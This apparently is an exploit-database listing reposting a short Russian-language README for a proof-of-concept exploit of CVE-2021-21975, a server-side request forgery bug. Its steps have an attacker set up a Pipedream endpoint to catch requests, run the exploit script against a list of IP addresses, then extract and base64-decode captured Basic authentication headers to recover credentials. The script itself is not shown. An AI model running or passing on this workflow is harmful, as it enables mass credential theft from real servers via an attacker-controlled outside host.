Sploitus

Exploit for CVE-2021-21975

kitploit · 2026-08-27

Exploit Code

MARKDOWN20 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-DORKERDEVIL-CVE-2021-21975
# CVE-2021-21975

#SSRF-POC - ssrf к утечке учетных данных

#Сначала настройте pd client.

#Теперь запустите ./pd deploy http-new-requests

#теперь замените http-запрос pipedream напр.: Randomstring.m.pipedream.net в скрипте

#запустите это в отдельном терминале - ./pd logs new-requests | tee -a req.txt

#и теперь запустите это в другом терминале - python3 CVE-2021-21975.py iplist

#cat req.txt | grep Basic > basic.txt; cat basic.txt | sort --unique > basic_uniq.txt ; base64 -d basic_uniq.txt

"Это ранний proof of concept, созданный, когда уязвимость стала публичной несколько месяцев назад, так что используйте его на свой страх и риск." :V

#авторы @wabaf3t @D0rkerDevil